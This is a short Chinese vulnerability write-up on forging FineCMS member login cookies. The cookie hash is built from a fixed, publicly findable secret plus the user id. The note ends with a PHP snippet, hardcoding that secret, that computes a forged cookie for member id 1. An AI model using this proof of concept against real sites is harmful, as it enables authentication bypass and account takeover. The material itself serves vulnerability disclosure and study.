Finecms Cookie Forged

##Finecms Cookie伪造

/controllers/member/LoginController.php

看上去很容易被伪造只要知道 SITE_MEMBER_COOKIE 就行了

cookie表前缀+字符串，我通过github搜索发现字符串并不是随机生成的而是固定的值

  set_cookie('member_id', $member['id'], $time);

    set_cookie('member_code', substr(md5(SITE_MEMBER_COOKIE . $member['id']), 5, 20), $time);

构造cookiehash

<?php
$hash = substr(md5("2967e68d382902a"."1"), 5, 20);

echo $hash;
?>